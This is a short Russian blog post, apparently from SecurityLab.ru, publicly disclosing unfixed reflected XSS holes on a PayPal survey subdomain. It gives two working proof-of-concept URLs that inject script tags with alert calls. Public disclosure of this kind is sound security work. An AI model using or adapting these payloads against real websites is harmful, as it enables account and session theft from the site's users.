XSS в PayPal (попытка №2)

2907
XSS в PayPal (попытка №2)
На прошлой неделе SecurityLab опубликовал новость о наличии XSS уязвимостей в PayPal. Неделю спустя исправлена только та уязвимость, на которую была прямая ссылка :). Все остальные до сих пор не исправлены. Примеры:

surveyc.paypal.com/dat.php?m=1>"><script>alert('www.securitylab.ru')</script>&c=0&pg=1

surveyc.paypal.com/login/?target=/rep.php%3Fm%3D2%26c%3D0%26pg%3D7"><script>alert('www.securitylab.ru')</script>&explanation=1

PS. Классная у них безопасность!
Security
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
SECLAB / TG
LIVE SecurityLab.ru
Вы зашли хитро.
Дальше — совсем просто.
Одна кнопка — и SecurityLab в вашей ленте. Новости про взломы без лишних маршрутов.
Подписаться @SecLabnews

Валерий Марчук

Блог посвящен безопасности и жизни секлаба

Реклама 18+
Рекламодатель
Реклама. АО «Позитив Текнолоджиз». ИНН 7718668887. 18+
Сайт рекламодателя: ptsecurity.com
Реклама